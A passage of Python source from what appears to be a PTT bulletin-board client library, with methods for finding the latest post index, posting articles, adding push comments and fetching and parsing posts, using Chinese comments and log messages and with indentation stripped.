ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode, result
# print(self.__ReceiveData[ConnectIndex])
ReceiveDataLines = self.__ReceiveData[ConnectIndex].split('\n')
ReceiveDataLines = ReceiveDataLines[2:-1]
self.__ReceiveData[ConnectIndex] = '\n'.join(ReceiveDataLines)
self.__ReceiveData[ConnectIndex] = self.__ReceiveData[ConnectIndex][:self.__ReceiveData[ConnectIndex].find('★ ')]
AllIndex = re.findall(r'\d+ ', self.__ReceiveData[ConnectIndex])
if len(AllIndex) == 0:
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode, result
AllIndex = list(set(map(int, AllIndex)))
AllIndex.sort(reverse=True)
# print(AllIndex)
for IndexTemp in AllIndex:
# 確認是否連續 只有文章編號才可能連續
isContinue = True
for i in range(1, 3):
if str(IndexTemp - i) not in self.__ReceiveData[ConnectIndex]:
isContinue = False
break
if isContinue:
result = IndexTemp
break
if result == 0:
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
# 確認是否有因為上篇文章是數字結尾導致判斷錯誤的情況
for i in range(1, 20):
if str(result + 1) in self.__ReceiveData[ConnectIndex]:
result += 1
else:
break
SendMessage = GotoMainMenuCommand + 'qs' + Board + '\r\x03\x03 ' + str(result) + '\rQ'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'取得可閱讀文章',
'文章代碼',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'取得可閱讀文章',
'文章網址',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'取得可閱讀文章',
'這一篇文章值',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'請按任意鍵繼續',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.UnknowError
),
PTTBUGDetectUnit
]
ShowFixResult = False
for TryResult in range(result, result - 100, -1):
FindResult = False
#self.Log('Try: ' + Board + ' ' + str(TryResult))
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 ' + str(TryResult) + '\rQ'
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
if ShowFixResult:
self.Log(DetectTarget.getDisplayMsg())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
if result != TryResult:
if ShowFixResult:
self.Log('修正結果為 ' + str(TryResult), LogLevel.DEBUG)
result = TryResult
FindResult = True
else:
ShowFixResult = True
break
if not isDetectedTarget:
continue
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
# self.Log('無法解析的狀態! PTT Library 緊急停止')
# sys.exit()
if FindResult:
break
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
def post(self, Board, Title, Content, PostType, SignType):
ConnectIndex = 0
self.__IdleTime = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
Board = str(Board)
Title = str(Title)
Content = str(Content)
PostType = int(PostType)
SignType = int(SignType)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
# 前進至板面
self.__APILock[ConnectIndex].acquire()
if '看板《' + Board + '》' in self.__ReceiveData[ConnectIndex] and '文章選讀' in self.__ReceiveData[ConnectIndex]:
self.Log('已經位於 ' + Board + ' 板', LogLevel.DEBUG)
else:
CatchList = [
# 0
'文章選讀',
]
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == -1:
self.Log('前進至 ' + Board + '板失敗')
print(self.__ReceiveData[ConnectIndex])
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
# 確認是否有發文權限
CatchList = [
# 0
'或不選',
# 1
'使用者不可發言',
]
SendMessage = '\x10'
Refresh = False
ExtraWait = 0
Retry = False
RetryCount = 0
while True:
if Retry:
Retry = False
RetryCount += 1
if RetryCount == 3:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
else:
RetryCount = 0
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = ' '
Refresh = False
ExtraWait = 0
if CatchIndex == 0:
self.Log('具備發文權限', LogLevel.DEBUG)
break
elif CatchIndex == 1:
self.Log('你被水桶惹 QQ')
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.NoPermission
self.__ErrorCode = ErrCode
return ErrCode
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = str(PostType) + '\r' + str(Title) + '\r' + str(Content) + '\x18'
self.Log('送出文章', LogLevel.DEBUG)
Refresh = True
ExtraWait = 0
CatchList = [
# 0
'確定要儲存檔案嗎',
]
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
self.Log('儲存檔案', LogLevel.DEBUG)
SendMessage = 's\r'
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
CatchList = [
# 0
'任意鍵繼續',
# 1
'x=隨機',
# 2
'文章選讀',
]
Refresh = True
ExtraWait = 0
while True:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
break
elif CatchIndex == 1:
self.Log('選擇簽名檔: ' + str(SignType), LogLevel.DEBUG)
SendMessage = str(SignType) + '\r'
elif CatchIndex == 2:
break
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
def push(self, Board, inputPushType, PushContent, PostID='', PostIndex=0):
self.__IdleTime = 0
ConnectIndex = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
Board = str(Board)
inputPushType = int(inputPushType)
PushContent = str(PushContent)
PostID = str(PostID)
PostIndex = int(PostIndex)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if len(Board) == 0:
self.Log('看板名稱輸入錯誤: ' + str(Board))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostIndex != 0 and PostID != '':
self.Log('文章編號與代碼輸入錯誤: 同時輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostIndex == 0 and PostID == '':
self.Log('文章編號與代碼輸入錯誤: 皆無輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
MaxPushLength = 45
self.__PushShow = False
PushList = []
Temp = ''
TempStartIndex = 0
TempEndIndex = TempStartIndex + 1
while TempEndIndex <= len(PushContent):
Temp = ''
while len(Temp.encode('big5')) < MaxPushLength:
Temp = PushContent[TempStartIndex:TempEndIndex]
if not len(Temp.encode('big5')) < MaxPushLength:
break
elif PushContent.endswith(Temp):
break
TempEndIndex += 1
PushList.append(Temp)
TempStartIndex = TempEndIndex
TempEndIndex = TempStartIndex + 1
self.__APILock[ConnectIndex].acquire()
for Push in PushList:
# print('Push:', Push)
ErrCode = self.__push(Board, inputPushType, Push, PostID=PostID, PostIndex=PostIndex)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
return ErrCode
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
def __push(self, Board, inputPushType, PushContent, PostID='', PostIndex=0):
ConnectIndex = 0
SendMessage = ''
if '看板《' + Board + '》' in self.__ReceiveData[ConnectIndex] and '文章選讀' in self.__ReceiveData[ConnectIndex]:
self.Log('已經位於 ' + Board + ' 板', LogLevel.DEBUG)
else:
# 前進至板面
SendMessage += '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
# 前進至文章
if PostID != '':
SendMessage += '#' + PostID + '\r'
else:
SendMessage += str(PostIndex) + '\r'
# 查看是否具備推文權限
SendMessage += 'X'
CatchList = [
# 0
'您覺得這篇文章',
# 1
'禁止快速連續推文',
# 2
'禁止短時間內大量推文',
# 3
'使用者不可發言',
# 4
'加註方式',
# 5
'◆ 本文已刪除',
]
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
self.Log('具備推文權限', LogLevel.DEBUG)
if '值得推薦' in self.__ReceiveData[ConnectIndex]:
Push = True
else:
Push = False
if '給它噓聲' in self.__ReceiveData[ConnectIndex]:
Boo = True
else:
Boo = False
if '→註解' in self.__ReceiveData[ConnectIndex]:
Arrow = True
else:
Arrow = False
if inputPushType == PushType.Push:
if not Push:
inputPushType = PushType.Arrow
elif inputPushType == PushType.Boo:
if not Boo:
inputPushType = PushType.Arrow
elif inputPushType == PushType.Arrow:
if not Arrow:
inputPushType = PushType.Push
else:
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
self.Log('準備推文')
SendMessage = str(inputPushType) + str(PushContent) + '\ry\r'
elif CatchIndex == 1:
self.Log('禁止快速推文')
ErrCode = ErrorCode.NoFastPush
self.__ErrorCode = ErrCode
return ErrCode
elif CatchIndex == 2:
self.Log('禁止機器人快速推文')
ErrCode = ErrorCode.NoFastPush
self.__ErrorCode = ErrCode
return ErrCode
elif CatchIndex == 3:
self.Log('你被水桶惹 QQ')
ErrCode = ErrorCode.NoPermission
self.__ErrorCode = ErrCode
return ErrCode
elif CatchIndex == 4:
if not self.__PushShow:
self.Log('作者本人使用箭頭')
self.__PushShow = True
SendMessage = str(PushContent) + '\ry\r'
elif CatchIndex == 5:
self.Log('文章已經被刪除')
ErrCode = ErrorCode.PostDeleted
self.__ErrorCode = ErrCode
return ErrCode
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
CatchList = []
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
# print(self.__ReceiveData[ConnectIndex])
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
def getPost(self, Board, PostID='', PostIndex=0, _ConnectIndex=0, SearchType=0, Search=''):
self.__IdleTime = 0
ConnectIndex = _ConnectIndex
result = None
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, result
try:
Board = str(Board)
PostID = str(PostID)
PostIndex = int(PostIndex)
SearchType = int(SearchType)
Search = str(Search)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if len(Board) == 0:
self.Log('看板名稱輸入錯誤: ' + str(Board))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if PostIndex != 0 and PostID != '':
self.Log('文章編號與代碼輸入錯誤: 同時輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if PostIndex == 0 and PostID == '':
self.Log('文章編號與代碼輸入錯誤: 皆無輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if SearchType < PostSearchType.MinValue or PostSearchType.MaxValue < SearchType:
self.Log('搜尋類型輸入錯誤: 無法判別搜尋類型 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
if (Search != '' and SearchType == PostSearchType.Unknow) or (Search == '' and SearchType != PostSearchType.Unknow):
self.Log('無法判別搜尋類型 搜尋條件失效', LogLevel.WARNING)
Search = ''
if PostID != '' and Search != '':
self.Log('使用文章代碼取得文章 搜尋條件失效', LogLevel.WARNING)
Search = ''
if SearchType == PostSearchType.Keyword:
pass
elif SearchType == PostSearchType.Author:
pass
elif SearchType == PostSearchType.Push:
if not Search.isdigit():
self.Log('搜尋條件輸入錯誤: 搜尋推文數 但搜尋條件非數字 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
elif SearchType == PostSearchType.Mark:
if Search != 'm' and Search != 's':
self.Log('搜尋條件輸入錯誤: 搜尋標記 但搜尋條件非 m 或 s 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
elif SearchType == PostSearchType.Money:
if not Search.isdigit():
self.Log('搜尋條件輸入錯誤: 搜尋稿酬 但搜尋條件非數字 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
self.__APILock[ConnectIndex].acquire()
for i in range(3):
ErrCode, Post = self.__getPost(Board, PostID, PostIndex, _ConnectIndex, SearchType, Search)
if ErrCode == ErrorCode.PostDeleted:
if Post == None:
continue
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, Post
if ErrCode != ErrorCode.Success:
continue
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, Post
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, Post
def __parsePush(self, line):
# print('__parsePush line: ' + line)
ErrCode = ErrorCode.Success
CurrentPush = None
line = line.lstrip()
CurrentPushType = PushType.Unknow
if line.startswith('推'):
CurrentPushType = PushType.Push
elif line.startswith('噓'):
CurrentPushType = PushType.Boo
elif line.startswith('→'):
CurrentPushType = PushType.Arrow
if CurrentPushType == PushType.Unknow:
return ErrorCode.ParseError, None
PushAuthor = line
PushAuthor = PushAuthor[2:]
PushAuthor = PushAuthor[:PushAuthor.find(':')]
while PushAuthor.endswith(' '):
PushAuthor = PushAuthor[:-1]
Target = ': '
PushContent = line[:-11]
PushContent = PushContent[PushContent.find(Target) + len(Target):]
PushContent = PushContent.rstrip()
PushIP = None
IPIndex_start = PushContent.rfind(' ') + 1
IPTemp = PushContent[IPIndex_start:]
IPCheck = re.search("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", IPTemp)
# 檢查 IP 格式並檢查與冒號的距離,大於10 避免推文內容是 IP 被當成推文 IP的情況
if IPCheck != None and (PushContent.find(IPCheck.group()) - PushContent.find(': ') > 10):
PushIP = IPCheck.group()
PushContent = PushContent[:PushContent.find(PushIP)]
PushContent = PushContent.rstrip()
PushTime = line[-11:]
if re.search("[0-9][0-9]:[0-9][0-9]", PushTime) == None:
return ErrorCode.ParseError, None
if re.search("[0-9][0-9]/[0-9][0-9]", PushTime) == None:
return ErrorCode.ParseError, None
# print('PushAuthor: =' + PushAuthor + '=')
# print('PushContent: =' + PushContent + '=')
# print('PushTime: =' + PushTime + '=')
CurrentPush = Information.PushInformation(CurrentPushType, PushAuthor, PushContent, PushIP, PushTime)
return ErrCode, CurrentPush
def __getPost(self, Board, PostID='', PostIndex=0, _ConnectIndex=0, SearchType=0, Search=''):
ConnectIndex = _ConnectIndex
result = None
SendMessage = GotoMainMenuCommand + 'qs' + Board + '\r\x03\x03 '
# 前進至文章
if PostID != '':
SendMessage += '#' + PostID + '\rQ'
elif PostIndex != -1:
if Search != '':
if SearchType == PostSearchType.Keyword:
SendMessage += '/' + Search + '\r'
elif SearchType == PostSearchType.Author:
SendMessage += 'a' + Search + '\r'
elif SearchType == PostSearchType.Push:
SendMessage += 'Z' + Search + '\r'
elif SearchType == PostSearchType.Mark:
SendMessage += 'G' + Search + '\r'
elif SearchType == PostSearchType.Money:
SendMessage += 'A' + Search + '\r'
SendMessage += str(PostIndex) + '\rQ'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'取得文章',
'請按任意鍵繼續',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'取得文章',
'這一篇文章值',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'取得文章',
'文章代碼(AID):',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'遇到 PTT BUG!!',
'PttBug',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.PttBug
),
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode, None
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), LogLevel.DEBUG)
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
if ErrCode == ErrorCode.PttBug:
self.__connectRemote(ConnectIndex)
self.__ErrorCode = ErrCode
return ErrCode, None
break
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
break
if not isDetectedTarget:
for line in self.__ReceiveData[ConnectIndex].split('\n'):
# 78369 10/08 - □ (本文已被刪除) [QQ1]
# 77579 s 10/06 - □ (本文已被刪除) <QQ2>
if line.startswith(self.__Cursor):
CheckDeleteList = ['本文', '已被', '刪除', '吃掉']
CheckDeleteResult = [False] * len(CheckDeleteList)
for i in range(len(CheckDeleteList)):
DeletedKeyword = CheckDeleteList[i]
if DeletedKeyword in line:
CheckDeleteResult[i] = True
if CheckDeleteResult.count(True) >= 2:
# print('deleted line: ' + line)
if '<' in line:
PostAuthor = line[line.find('<') + 1:]
PostAuthor = PostAuthor[:PostAuthor.find('>')]
# print('被版主刪除兒: >' + PostAuthor + '<')
result = Information.PostInformation(Board=Board, Author=PostAuthor, DeleteStatus=PostDeleteStatus.ByModerator)
elif '[' in line:
PostAuthor = line[line.find('[') + 1:]
PostAuthor = PostAuthor[:PostAuthor.find(']')]
# print('自己刪除兒: >' + PostAuthor + '<')
result = Information.PostInformation(Board=Board, Author=PostAuthor, DeleteStatus=PostDeleteStatus.ByAuthor)
else:
# print('無法判斷誰刪除: ' + line)
FakeAuthor = line
FakeAuthor = FakeAuthor[FakeAuthor.find(') ') + 2:]
FakeAuthor = FakeAuthor[:FakeAuthor.find(']')]
# print('FakeAuthor: ' + FakeAuthor)
RawData = self.__ReceiveRawData[ConnectIndex].decode(encoding='big5',errors='ignore')
if '[H' + FakeAuthor + ']' in RawData:
# print('Author: H' + FakeAuthor)
PostAuthor = 'H' + FakeAuthor
result = Information.PostInformation(Board=Board, Author=PostAuthor, DeleteStatus=PostDeleteStatus.ByAuthor)
if '[m' + FakeAuthor + ']' in RawData:
# print('Author: m' + FakeAuthor)
PostAuthor = 'm' + FakeAuthor
result = Information.PostInformation(Board=Board, Author=PostAuthor, DeleteStatus=PostDeleteStatus.ByAuthor)
ErrCode = ErrorCode.PostDeleted
self.__ErrorCode = ErrCode
return ErrCode, result
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + ' part 1', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
Lines = self.__ReceiveData[ConnectIndex].split('\n')
InfoLines = []
for Line in Lines:
# print('line: ' + Line)
if Line.startswith('│'):
# print('InfoLines: ' + Line)
InfoLines.append(Line)
if len(InfoLines) != 3:
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
Target = '#'
PostID = InfoLines[0]
PostID = PostID[PostID.find(Target) + len(Target):]
PostID = PostID[:PostID.find(' ')]
while PostID.endswith(' '):
PostID = PostID[:-1]
Target = '文章網址: '
PostWeb = InfoLines[1]
PostWeb = PostWeb[PostWeb.find(Target) + len(Target):]
PostWeb = PostWeb[:PostWeb.find(' ')]
while PostWeb.endswith(' '):
PostWeb = PostWeb[:-1]
try:
if '特殊文章,無價格記錄' in InfoLines[2]:
PostMoney = -1
else:
PostMoney = int(re.search(r'\d+', InfoLines[2]).group())
except:
PostMoney = -1
self.Log('取得文章價錢失敗: ' + InfoLines[2], LogLevel.DEBUG)
# self.Log('PostID: =' + PostID + '=')
# self.Log('PostTitle: =' + PostTitle + '=')
# self.Log('PostWeb: =' + PostWeb + '=')
# self.Log('PostMoney: =' + str(PostMoney) + '=')
SendMessage = '\r\r'
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'文章讀取完成',
'(100%) 目前',
ResponseUnit('', True),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'文章讀取完成',
'頁 (100%)',
ResponseUnit('', True),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'目前顯示: 第',
ResponseUnit('', True),
),
DetectUnit(
'',
'瀏覽 第',
ResponseUnit('', True),
),
DetectUnit(
'運作出錯',
'我是' + self.__ID,
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.ParseError
),
DetectUnit(
'運作出錯',
'任意鍵',
ResponseUnit('', True),
BreakDetect=True,
ErrCode = ErrorCode.ParseError
),
PTTBUGDetectUnit
]
FirstPage = ''
PageIndex = 2
LastPageIndex = 0
PostContentListTemp = []
PostRawContentListTemp = []
isFirstPage = True
PostIP = ''
NewLine, _ = uao.encode('\n')
NewLineByte = NewLine[0]
ControlCodeMode = False
FirstControlCodePage = True
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode, None
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
if FirstPage == '':
FirstPage = self.__ReceiveData[ConnectIndex]
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
if len(PostIP) == 0:
PostIP = re.findall( r'[0-9]+(?:\.[0-9]+){3}', self.__ReceiveData[ConnectIndex])
if len(PostIP) > 0:
PostIP = PostIP[0]
CurrentPage = self.__ReceiveData[ConnectIndex]
CurrentRawPage = self.__ReceiveRawData[ConnectIndex]
CurrentPageList = CurrentPage.split('\n')
CurrentRawPageList = CurrentRawPage.split('\n')
PageLineRangeTemp = CurrentPageList.pop()
CurrentRawPageList.pop()
PageLineRange = re.findall(r'\d+', PageLineRangeTemp)
if len(PageLineRange) <= 3:
if not ControlCodeMode:
# print(PageIndex)
self.Log('控制碼擷取文章模式啟動', _LogLevel=LogLevel.DEBUG)
FirstControlCodePage = True
ControlCodeMode = True
if not ControlCodeMode:
PageLineRange = list(map(int, PageLineRange))[-2:]
# OverlapLine = LastPageIndex - PageLineRange[0] + 1
AppendLine = PageLineRange[1] - LastPageIndex
if AppendLine > 0 and LastPageIndex != 0:
# ShowTarget = '洗髮用品、洗臉卸粧用品、沐浴用品、香皂類'
# if ShowTarget in CurrentPage:
# print(CurrentPageList)
# print(len(CurrentPageList))
# print('附加', AppendLine, '行')
# print(CurrentPageList[-AppendLine:])
CurrentPageList = CurrentPageList[-AppendLine:]
CurrentRawPageList = CurrentRawPageList[-AppendLine:]
# if not isFirstPage:
# for i in range(OverlapLine):
# for ii in range(len(CurrentRawPage)):
# if CurrentRawPage[ii] == NewLineByte:
# CurrentRawPage = CurrentRawPage[ii + 1:]
# break
LastPageIndex = PageLineRange[1]
PostContentListTemp.extend(CurrentPageList)
PostRawContentListTemp.extend(CurrentRawPageList)
else:
if FirstControlCodePage:
OverlapLine = 0
for i in range(len(CurrentPageList)):
# print('FirstControlCodePage: ' + CurrentPageList[i])
if CurrentPageList[i] in PostContentListTemp:
# print('!!!OverlapLine: ' + CurrentPageList[i])
OverlapLine = i + 1
CurrentPageList = CurrentPageList[OverlapLine:]
CurrentRawPageList = CurrentRawPageList[OverlapLine:]
FirstControlCodePage = False
PostContentListTemp.extend(CurrentPageList)
PostRawContentListTemp.extend(CurrentRawPageList)
else:
if not CurrentPageList[-3] in PostContentListTemp:
# print('ControModeLine: ' + CurrentPageList[-3])
PostContentListTemp.append(CurrentPageList[-3])
PostRawContentListTemp.append(CurrentRawPageList[-3])
if not CurrentPageList[-2] in PostContentListTemp:
# print('ControModeLine: ' + CurrentPageList[-2])
PostContentListTemp.append(CurrentPageList[-2])
PostRawContentListTemp.append(CurrentRawPageList[-2])
if not CurrentPageList[-1] in PostContentListTemp:
# print('ControModeLine: ' + CurrentPageList[-1])
PostContentListTemp.append(CurrentPageList[-1])
PostRawContentListTemp.append(CurrentRawPageList[-1])
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not ControlCodeMode:
SendMessage = str(PageIndex) + '\r'
PageIndex += 1
else:
SendMessage = MoveDownCommand
Refresh = True
isFirstPage = False
break
if not isDetectedTarget:
if len(self.__ReceiveData[ConnectIndex]) < 500:
pass
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + ' part 2', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
FirstPage = FirstPage[FirstPage.find('作者'):]
PostLineList = FirstPage.split('\n')
# if len(PostLineList) < 3:
# ErrCode = ErrorCode.ParseError
# self.__ErrorCode = ErrCode
# return ErrCode, None
# for line in PostLineList:
# print('Q', line)
Target = '作者 '
if Target in FirstPage:
PostAuthor = PostLineList[0]
PostAuthor = PostAuthor[PostAuthor.find(Target) + len(Target):]
PostAuthor = PostAuthor[:PostAuthor.find(')') + 1]
PostAuthor = PostAuthor.rstrip()
else:
PostAuthor = None
Target = '標題 '
if Target in FirstPage:
PostTitle = PostLineList[1]
PostTitle = PostTitle[PostTitle.find(Target) + len(Target):]
PostTitle = PostTitle[:PostTitle.find('\r')]
PostTitle = PostTitle.rstrip()
else:
PostTitle = None
Target = '時間 '
if Target in FirstPage:
PostDate = PostLineList[2]
PostDate = PostDate[PostDate.find(Target) + len(Target):]
PostDate = PostDate[:PostDate.find('\r')]
PostDate = PostDate.rstrip()
else:
PostDate = None
PostContentList = []
PostPushList = []
LastPostEndMarkIndex = 0
for i in range(len(PostContentListTemp)):
line = PostContentListTemp[i]
if '※' in line and ('發信站' in line or '批踢踢實業坊' in line):
LastPostEndMarkIndex = i
for i in range(len(PostContentListTemp)):
line = PostContentListTemp[i]
PostContentList.append(line)
if i > LastPostEndMarkIndex:
_, CurrentPush = self.__parsePush(line)
if CurrentPush != None:
PostPushList.append(CurrentPush)
